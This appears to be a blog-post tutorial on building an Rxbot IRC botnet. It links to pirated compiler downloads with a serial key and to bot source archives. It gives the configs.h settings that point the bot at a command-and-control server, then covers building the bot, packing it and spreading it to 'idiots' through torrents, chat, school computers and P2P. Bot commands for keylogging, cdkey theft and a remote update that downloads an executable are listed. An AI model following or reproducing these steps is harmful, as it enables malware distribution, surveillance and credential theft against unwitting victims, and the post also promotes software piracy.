How to make a botnet [full tut]

A botnet can be used to keylog computers, capture screen shots, turn on webcam and take pictures, get cdkeys, get passwords, perform DDoS attacks, run commands, open sites, basically anything really..




Here we go ladies and gentlemen.
Follow the tutorial:
-----------------------------

I. Setting up the C++ compilier: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition

here -

http://rapidshare.com/files/125980189/msc__.rar.html

Pass: itzforblitz

Serial: 812-2224558

2. Run setup.exe and install. Remember to input serial

3. Download and install Service Pack 6

here -

http://rapidshare.com/files/125983507/Vs6sp6.rar

NOTE: Replace Mcft with Micro.soft (do not include the ".")

4. After that Download and install the Windows Platform SDK:

here - http://rapidshare.com/files/125983830/sdk.rar

Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)

Code:

C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)


(it does not matter whats below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack: This botsource:

here - http://rapidshare.com/files/125984396/botnetsorce.rar

2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:


Put in quotations:
Code:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
Code:

char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list

download here -

http://rapidshare.com/files/125984564/cmands.rar

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

here - http://rapidshare.com/files/125984723/mirc632.rar

--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an idiot, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

Code:

@update hxxp://mybot.com/download/SMSPRO.exe 82

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

secret and private also key (xxxx)

This way no one besides you or another op can set the channel topic Smile
Remember to make your key the same as your channel password.
------------------------------------------------------------------------
Good IRC Servers:

irc.wotnet.com is bot friendly as long as the bots do not harm the server or other users
and Zerofusion (look in mIRC) is bot friendly.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all.
------------------------------------------------------------------------

End of tutorial

0 comments:

WordPress Theme: Blue Weed by Jai Nischal Verma | Ported by Ismail | Creative Commons Attribution-ShareAlike 2.5 License (2008).